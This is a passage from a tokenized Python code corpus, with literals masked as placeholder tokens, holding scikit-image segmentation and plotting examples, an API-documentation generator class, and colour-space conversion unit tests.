patch , cmap = plt . cm . gray , interpolation = '<STR_LIT>' , <EOL> vmin = <NUM_LIT:0> , vmax = <NUM_LIT:255> ) <EOL> ax . set_xlabel ( '<STR_LIT>' % ( i + <NUM_LIT:1> ) ) <EOL> fig . suptitle ( '<STR_LIT>' , fontsize = <NUM_LIT> ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import matplotlib . pyplot as plt <EOL> import numpy as np <EOL> from skimage . data import astronaut <EOL> from skimage . segmentation import felzenszwalb , slic , quickshift <EOL> from skimage . segmentation import mark_boundaries <EOL> from skimage . util import img_as_float <EOL> img = img_as_float ( astronaut ( ) [ : : <NUM_LIT:2> , : : <NUM_LIT:2> ] ) <EOL> segments_fz = felzenszwalb ( img , scale = <NUM_LIT:100> , sigma = <NUM_LIT:0.5> , min_size = <NUM_LIT:50> ) <EOL> segments_slic = slic ( img , n_segments = <NUM_LIT> , compactness = <NUM_LIT:10> , sigma = <NUM_LIT:1> ) <EOL> segments_quick = quickshift ( img , kernel_size = <NUM_LIT:3> , max_dist = <NUM_LIT:6> , ratio = <NUM_LIT:0.5> ) <EOL> print ( "<STR_LIT>" % len ( np . unique ( segments_fz ) ) ) <EOL> print ( "<STR_LIT>" % len ( np . unique ( segments_slic ) ) ) <EOL> print ( "<STR_LIT>" % len ( np . unique ( segments_quick ) ) ) <EOL> fig , ax = plt . subplots ( <NUM_LIT:1> , <NUM_LIT:3> , sharex = True , sharey = True , <EOL> subplot_kw = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> fig . set_size_inches ( <NUM_LIT:8> , <NUM_LIT:3> , forward = True ) <EOL> fig . tight_layout ( ) <EOL> ax [ <NUM_LIT:0> ] . imshow ( mark_boundaries ( img , segments_fz ) ) <EOL> ax [ <NUM_LIT:0> ] . set_title ( "<STR_LIT>" ) <EOL> ax [ <NUM_LIT:1> ] . imshow ( mark_boundaries ( img , segments_slic ) ) <EOL> ax [ <NUM_LIT:1> ] . set_title ( "<STR_LIT>" ) <EOL> ax [ <NUM_LIT:2> ] . imshow ( mark_boundaries ( img , segments_quick ) ) <EOL> ax [ <NUM_LIT:2> ] . set_title ( "<STR_LIT>" ) <EOL> for a in ax : <EOL> a . set_xticks ( ( ) ) <EOL> a . set_yticks ( ( ) ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> from types import BuiltinFunctionType , FunctionType <EOL> DEBUG = True <EOL> class ApiDocWriter ( object ) : <EOL> '''<STR_LIT>''' <EOL> rst_section_levels = [ '<STR_LIT:*>' , '<STR_LIT:=>' , '<STR_LIT:->' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , <EOL> package_name , <EOL> rst_extension = '<STR_LIT>' , <EOL> package_skip_patterns = None , <EOL> module_skip_patterns = None , <EOL> ) : <EOL> '''<STR_LIT>''' <EOL> if package_skip_patterns is None : <EOL> package_skip_patterns = [ '<STR_LIT>' ] <EOL> if module_skip_patterns is None : <EOL> module_skip_patterns = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . package_name = package_name <EOL> self . rst_extension = rst_extension <EOL> self . package_skip_patterns = package_skip_patterns <EOL> self . module_skip_patterns = module_skip_patterns <EOL> def get_package_name ( self ) : <EOL> return self . _package_name <EOL> def set_package_name ( self , package_name ) : <EOL> '''<STR_LIT>''' <EOL> self . _package_name = package_name <EOL> root_module = self . _import ( package_name ) <EOL> self . root_path = root_module . __path__ [ - <NUM_LIT:1> ] <EOL> self . written_modules = None <EOL> package_name = property ( get_package_name , set_package_name , None , <EOL> '<STR_LIT>' ) <EOL> def _import ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> mod = __import__ ( name ) <EOL> components = name . split ( '<STR_LIT:.>' ) <EOL> for comp in components [ <NUM_LIT:1> : ] : <EOL> mod = getattr ( mod , comp ) <EOL> return mod <EOL> def _get_object_name ( self , line ) : <EOL> '''<STR_LIT>''' <EOL> name = line . split ( ) [ <NUM_LIT:1> ] . split ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] . strip ( ) <EOL> return name . rstrip ( '<STR_LIT::>' ) <EOL> def _uri2path ( self , uri ) : <EOL> '''<STR_LIT>''' <EOL> if uri == self . package_name : <EOL> return os . path . join ( self . root_path , '<STR_LIT>' ) <EOL> path = uri . replace ( self . 
package_name + '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> path = path . replace ( '<STR_LIT:.>' , os . path . sep ) <EOL> path = os . path . join ( self . root_path , path ) <EOL> if os . path . exists ( path + '<STR_LIT>' ) : <EOL> path += '<STR_LIT>' <EOL> elif os . path . exists ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> path = os . path . join ( path , '<STR_LIT>' ) <EOL> else : <EOL> return None <EOL> return path <EOL> def _path2uri ( self , dirpath ) : <EOL> '''<STR_LIT>''' <EOL> package_dir = self . package_name . replace ( '<STR_LIT:.>' , os . path . sep ) <EOL> relpath = dirpath . replace ( self . root_path , package_dir ) <EOL> if relpath . startswith ( os . path . sep ) : <EOL> relpath = relpath [ <NUM_LIT:1> : ] <EOL> return relpath . replace ( os . path . sep , '<STR_LIT:.>' ) <EOL> def _parse_module ( self , uri ) : <EOL> '''<STR_LIT>''' <EOL> filename = self . _uri2path ( uri ) <EOL> if filename is None : <EOL> print ( filename , '<STR_LIT>' ) <EOL> return ( [ ] , [ ] ) <EOL> f = open ( filename , '<STR_LIT>' ) <EOL> functions , classes = self . _parse_lines ( f ) <EOL> f . close ( ) <EOL> return functions , classes <EOL> def _parse_module_with_import ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> mod = __import__ ( uri , fromlist = [ uri . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ] ) <EOL> obj_strs = [ obj for obj in dir ( mod ) if not obj . startswith ( '<STR_LIT:_>' ) ] <EOL> functions = [ ] <EOL> classes = [ ] <EOL> for obj_str in obj_strs : <EOL> if obj_str not in mod . __dict__ : <EOL> continue <EOL> obj = mod . __dict__ [ obj_str ] <EOL> if isinstance ( obj , ( FunctionType , BuiltinFunctionType ) ) : <EOL> functions . append ( obj_str ) <EOL> else : <EOL> try : <EOL> issubclass ( obj , object ) <EOL> classes . 
append ( obj_str ) <EOL> except TypeError : <EOL> pass <EOL> return functions , classes <EOL> def _parse_lines ( self , linesource ) : <EOL> '''<STR_LIT>''' <EOL> functions = [ ] <EOL> classes = [ ] <EOL> for line in linesource : <EOL> if line . startswith ( '<STR_LIT>' ) and line . count ( '<STR_LIT:(>' ) : <EOL> name = self . _get_object_name ( line ) <EOL> if not name . startswith ( '<STR_LIT:_>' ) : <EOL> functions . append ( name ) <EOL> elif line . startswith ( '<STR_LIT>' ) : <EOL> name = self . _get_object_name ( line ) <EOL> if not name . startswith ( '<STR_LIT:_>' ) : <EOL> classes . append ( name ) <EOL> else : <EOL> pass <EOL> functions . sort ( ) <EOL> classes . sort ( ) <EOL> return functions , classes <EOL> def generate_api_doc ( self , uri ) : <EOL> '''<STR_LIT>''' <EOL> functions , classes = self . _parse_module_with_import ( uri ) <EOL> if not len ( functions ) and not len ( classes ) and DEBUG : <EOL> print ( '<STR_LIT>' , uri ) <EOL> return '<STR_LIT>' <EOL> uri_short = re . sub ( r'<STR_LIT>' % self . package_name , '<STR_LIT>' , uri ) <EOL> ad = '<STR_LIT>' <EOL> if '<STR_LIT:.>' in uri : <EOL> title = '<STR_LIT>' + uri_short + '<STR_LIT>' <EOL> else : <EOL> title = '<STR_LIT>' + uri_short + '<STR_LIT>' <EOL> ad += title + '<STR_LIT:\n>' + self . rst_section_levels [ <NUM_LIT:1> ] * len ( title ) <EOL> ad += '<STR_LIT>' + uri + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' + uri + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' <EOL> for f in functions : <EOL> ad += '<STR_LIT:U+0020>' + uri + '<STR_LIT:.>' + f + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT:\n>' <EOL> for c in classes : <EOL> ad += '<STR_LIT:U+0020>' + uri + '<STR_LIT:.>' + c + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT:\n>' <EOL> for f in functions : <EOL> full_f = uri + '<STR_LIT:.>' + f <EOL> ad += f + '<STR_LIT:\n>' <EOL> ad += self . 
rst_section_levels [ <NUM_LIT:2> ] * len ( f ) + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' + full_f + '<STR_LIT>' <EOL> for c in classes : <EOL> ad += '<STR_LIT>' + c + '<STR_LIT>' + self . rst_section_levels [ <NUM_LIT:2> ] * ( len ( c ) + <NUM_LIT:9> ) + '<STR_LIT>' <EOL> ad += '<STR_LIT>' + c + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT>' <EOL> return ad <EOL> def _survives_exclude ( self , matchstr , match_type ) : <EOL> '''<STR_LIT>''' <EOL> if match_type == '<STR_LIT>' : <EOL> patterns = self . module_skip_patterns <EOL> elif match_type == '<STR_LIT>' : <EOL> patterns = self . package_skip_patterns <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % match_type ) <EOL> L = len ( self . package_name ) <EOL> if matchstr [ : L ] == self . package_name : <EOL> matchstr = matchstr [ L : ] <EOL> for pat in patterns : <EOL> try : <EOL> pat . search <EOL> except AttributeError : <EOL> pat = re . compile ( pat ) <EOL> if pat . search ( matchstr ) : <EOL> return False <EOL> return True <EOL> def discover_modules ( self ) : <EOL> '''<STR_LIT>''' <EOL> modules = [ self . package_name ] <EOL> for dirpath , dirnames , filenames in os . walk ( self . root_path ) : <EOL> root_uri = self . _path2uri ( os . path . join ( self . root_path , <EOL> dirpath ) ) <EOL> for dirname in dirnames [ : ] : <EOL> package_uri = '<STR_LIT:.>' . join ( ( root_uri , dirname ) ) <EOL> if ( self . _uri2path ( package_uri ) and <EOL> self . _survives_exclude ( package_uri , '<STR_LIT>' ) ) : <EOL> modules . append ( package_uri ) <EOL> else : <EOL> dirnames . remove ( dirname ) <EOL> return sorted ( modules ) <EOL> def write_modules_api ( self , modules , outdir ) : <EOL> written_modules = [ ] <EOL> for m in modules : <EOL> api_str = self . generate_api_doc ( m ) <EOL> if not api_str : <EOL> continue <EOL> outfile = os . path . join ( outdir , <EOL> m + self . rst_extension ) <EOL> fileobj = open ( outfile , '<STR_LIT>' ) <EOL> fileobj . 
write ( api_str ) <EOL> fileobj . close ( ) <EOL> written_modules . append ( m ) <EOL> self . written_modules = written_modules <EOL> def write_api_docs ( self , outdir ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( outdir ) : <EOL> os . mkdir ( outdir ) <EOL> modules = self . discover_modules ( ) <EOL> self . write_modules_api ( modules , outdir ) <EOL> def write_index ( self , outdir , froot = '<STR_LIT>' , relative_to = None ) : <EOL> """<STR_LIT>""" <EOL> if self . written_modules is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> path = os . path . join ( outdir , froot + self . rst_extension ) <EOL> if relative_to is not None : <EOL> relpath = ( outdir + os . path . sep ) . replace ( relative_to + os . path . sep , '<STR_LIT>' ) <EOL> else : <EOL> relpath = outdir <EOL> print ( "<STR_LIT>" , relpath ) <EOL> idx = open ( path , '<STR_LIT>' ) <EOL> w = idx . write <EOL> w ( '<STR_LIT>' ) <EOL> title = "<STR_LIT>" <EOL> w ( title + "<STR_LIT:\n>" ) <EOL> w ( "<STR_LIT:=>" * len ( title ) + "<STR_LIT>" ) <EOL> w ( '<STR_LIT>' ) <EOL> for f in self . written_modules : <EOL> w ( '<STR_LIT>' % os . path . join ( relpath , f ) ) <EOL> idx . close ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import os . path <EOL> import numpy as np <EOL> from numpy . testing import ( assert_equal , <EOL> assert_almost_equal , <EOL> assert_array_almost_equal , <EOL> assert_raises , <EOL> TestCase , <EOL> ) <EOL> from skimage import img_as_float , img_as_ubyte <EOL> from skimage . io import imread <EOL> from skimage . color import ( rgb2hsv , hsv2rgb , <EOL> rgb2xyz , xyz2rgb , <EOL> rgb2hed , hed2rgb , <EOL> separate_stains , <EOL> combine_stains , <EOL> rgb2rgbcie , rgbcie2rgb , <EOL> convert_colorspace , <EOL> rgb2grey , gray2rgb , <EOL> xyz2lab , lab2xyz , <EOL> lab2rgb , rgb2lab , <EOL> xyz2luv , luv2xyz , <EOL> luv2rgb , rgb2luv , <EOL> lab2lch , lch2lab , <EOL> guess_spatial_dimensions <EOL> ) <EOL> from skimage import data_dir <EOL> from skimage . _shared . _warnings import expected_warnings <EOL> import colorsys <EOL> def test_guess_spatial_dimensions ( ) : <EOL> im1 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> im2 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> im3 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> im4 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> im5 = np . zeros ( ( <NUM_LIT:5> , ) ) <EOL> assert_equal ( guess_spatial_dimensions ( im1 ) , <NUM_LIT:2> ) <EOL> assert_equal ( guess_spatial_dimensions ( im2 ) , <NUM_LIT:3> ) <EOL> assert_equal ( guess_spatial_dimensions ( im3 ) , None ) <EOL> assert_equal ( guess_spatial_dimensions ( im4 ) , <NUM_LIT:3> ) <EOL> assert_raises ( ValueError , guess_spatial_dimensions , im5 ) <EOL> class TestColorconv ( TestCase ) : <EOL> img_rgb = imread ( os . path . join ( data_dir , '<STR_LIT>' ) ) <EOL> img_grayscale = imread ( os . path . join ( data_dir , '<STR_LIT>' ) ) <EOL> colbars = np . 
array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) . astype ( np . float ) <EOL> colbars_array = np . swapaxes ( colbars . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> colbars_point75 = colbars * <NUM_LIT> <EOL> colbars_point75_array = np . swapaxes ( colbars_point75 . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> xyz_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> ] ) <EOL> lab_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] , <EOL> ] ) <EOL> luv_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] , <EOL> ] ) <EOL> def test_rgb2hsv_conversion ( self ) : <EOL> rgb = img_as_float ( self . img_rgb ) [ : : <NUM_LIT:16> , : : <NUM_LIT:16> ] <EOL> hsv = rgb2hsv ( rgb ) . reshape ( - <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> gt = np . array ( [ colorsys . rgb_to_hsv ( pt [ <NUM_LIT:0> ] , pt [ <NUM_LIT:1> ] , pt [ <NUM_LIT:2> ] ) <EOL> for pt in rgb . 
reshape ( - <NUM_LIT:1> , <NUM_LIT:3> ) ] <EOL> ) <EOL> assert_almost_equal ( hsv , gt ) <EOL> def test_rgb2hsv_error_grayscale ( self ) : <EOL> self . assertRaises ( ValueError , rgb2hsv , self . img_grayscale ) <EOL> def test_rgb2hsv_error_one_element ( self ) : <EOL> self . assertRaises ( ValueError , rgb2hsv , self . img_rgb [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> def test_hsv2rgb_conversion ( self ) : <EOL> rgb = self . img_rgb . astype ( "<STR_LIT>" ) [ : : <NUM_LIT:16> , : : <NUM_LIT:16> ] <EOL> hsv = np . array ( [ colorsys . rgb_to_hsv ( pt [ <NUM_LIT:0> ] , pt [ <NUM_LIT:1> ] , pt [ <NUM_LIT:2> ] ) <EOL> for pt in rgb . reshape ( - <NUM_LIT:1> , <NUM_LIT:3> ) ] ) . reshape ( rgb . shape ) <EOL> assert_almost_equal ( rgb , hsv2rgb ( hsv ) , decimal = <NUM_LIT:4> ) <EOL> def test_hsv2rgb_error_grayscale ( self ) : <EOL> self . assertRaises ( ValueError , hsv2rgb , self . img_grayscale ) <EOL> def test_hsv2rgb_error_one_element ( self ) : <EOL> self . assertRaises ( ValueError , hsv2rgb , self . img_rgb [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> def test_rgb2xyz_conversion ( self ) : <EOL> gt = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ] ) <EOL> assert_almost_equal ( rgb2xyz ( self . colbars_array ) , gt ) <EOL> def test_rgb2xyz_error_grayscale ( self ) : <EOL> self . assertRaises ( ValueError , rgb2xyz , self . img_grayscale ) <EOL> def test_rgb2xyz_error_one_element ( self ) : <EOL> self . assertRaises ( ValueError , rgb2xyz , self . img_rgb [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> def test_xyz2rgb_conversion ( self ) : <EOL> assert_almost_equal ( xyz2rgb ( rgb2xyz ( self . colbars_array ) ) , <EOL> self . 
colbars_array ) <EOL> def test_xyz_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> assert_array_almost_equal ( xyz2rgb ( rgb2xyz ( img_rgb ) ) , img_rgb ) <EOL> def test_hed_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_ubyte ( self . img_rgb ) <EOL> with expected_warnings ( [ '<STR_LIT>' ] ) : <EOL> new = img_as_ubyte ( hed2rgb ( rgb2hed ( img_rgb ) ) ) <EOL> assert_equal ( new , img_rgb ) <EOL> def test_hed_rgb_float_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> assert_array_almost_equal ( hed2rgb ( rgb2hed ( img_rgb ) ) , img_rgb ) <EOL> def test_hdx_rgb_roundtrip ( self ) : <EOL> from skimage . color . colorconv import hdx_from_rgb , rgb_from_hdx <EOL> img_rgb = self . img_rgb <EOL> conv = combine_stains ( separate_stains ( img_rgb , hdx_from_rgb ) , <EOL> rgb_from_hdx ) <EOL> assert_equal ( img_as_ubyte ( conv ) , img_rgb ) <EOL> def test_hdx_rgb_roundtrip ( self ) : <EOL> from skimage . color . colorconv import hdx_from_rgb , rgb_from_hdx <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> conv = combine_stains ( separate_stains ( img_rgb , hdx_from_rgb ) , <EOL> rgb_from_hdx ) <EOL> assert_array_almost_equal ( conv , img_rgb ) <EOL> def test_rgb2rgbcie_conversion ( self ) : <EOL> gt = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ] ) <EOL> assert_almost_equal ( rgb2rgbcie ( self . colbars_array ) , gt ) <EOL> def test_rgbcie2rgb_conversion ( self ) : <EOL> assert_almost_equal ( rgbcie2rgb ( rgb2rgbcie ( self . colbars_array ) ) , <EOL> self . 
colbars_array ) <EOL> def test_convert_colorspace ( self ) : <EOL> colspaces = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> colfuncs_from = [ hsv2rgb , rgbcie2rgb , xyz2rgb ] <EOL> colfuncs_to = [ rgb2hsv , rgb2rgbcie , rgb2xyz ] <EOL> assert_almost_equal ( convert_colorspace ( self . colbars_array , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , self . colbars_array ) <EOL> for i , space in enumerate ( colspaces ) : <EOL> gt = colfuncs_from [ i ] ( self . colbars_array ) <EOL> assert_almost_equal ( convert_colorspace ( self . colbars_array , space , <EOL> '<STR_LIT>' ) , gt ) <EOL> gt = colfuncs_to [ i ] ( self . colbars_array ) <EOL> assert_almost_equal ( convert_colorspace ( self . colbars_array , '<STR_LIT>' , <EOL> space ) , gt ) <EOL> self . assertRaises ( ValueError , convert_colorspace , self . colbars_array , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , convert_colorspace , self . colbars_array , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_rgb2grey ( self ) : <EOL> x = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) . reshape ( ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) ) . astype ( np . float ) <EOL> g = rgb2grey ( x ) <EOL> assert_array_almost_equal ( g , <NUM_LIT:1> ) <EOL> assert_equal ( g . shape , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> def test_rgb2grey_contiguous ( self ) : <EOL> x = np . random . rand ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:3> ) <EOL> assert rgb2grey ( x ) . flags [ "<STR_LIT>" ] <EOL> assert rgb2grey ( x [ : <NUM_LIT:5> , : <NUM_LIT:5> ] ) . flags [ "<STR_LIT>" ] <EOL> def test_rgb2grey_alpha ( self ) : <EOL> x = np . random . rand ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:4> ) <EOL> assert rgb2grey ( x ) . ndim == <NUM_LIT:2> <EOL> def test_rgb2grey_on_grey ( self ) : <EOL> rgb2grey ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> def test_xyz2lab ( self ) : <EOL> assert_array_almost_equal ( xyz2lab ( self . xyz_array ) , <EOL> self . 
lab_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab_array_I_obs , <EOL> xyz2lab ( self . xyz_array , I , obs ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab_array_I_obs , <EOL> xyz2lab ( self . xyz_array , I , "<STR_LIT:2>" ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> def test_lab2xyz ( self ) : <EOL> assert_array_almost_equal ( lab2xyz ( self . lab_array ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab2xyz ( lab_array_I_obs , I , obs ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab2xyz ( lab_array_I_obs , I , "<STR_LIT:2>" ) , <EOL> self . 
xyz_array , decimal = <NUM_LIT:3> ) <EOL> try : <EOL> xs = lab2xyz ( lab_array_I_obs , "<STR_LIT>" , "<STR_LIT:2>" ) <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> xs = lab2xyz ( lab_array_I_obs , "<STR_LIT>" , "<STR_LIT>" ) <EOL> except ValueError : <EOL> pass <EOL> def test_rgb2lab_brucelindbloom ( self ) : <EOL> """<STR_LIT>""" <EOL> gt_for_colbars = np . array ( [ <EOL> [ <NUM_LIT:100> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) . T <EOL> gt_array = np . swapaxes ( gt_for_colbars . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( rgb2lab ( self . colbars_array ) , gt_array , decimal = <NUM_LIT:2> ) <EOL> def test_lab_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> assert_array_almost_equal ( lab2rgb ( rgb2lab ( img_rgb ) ) , img_rgb ) <EOL> def test_xyz2luv ( self ) : <EOL> assert_array_almost_equal ( xyz2luv ( self . xyz_array ) , <EOL> self . luv_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv_array_I_obs , <EOL> xyz2luv ( self . xyz_array , I , obs ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . 
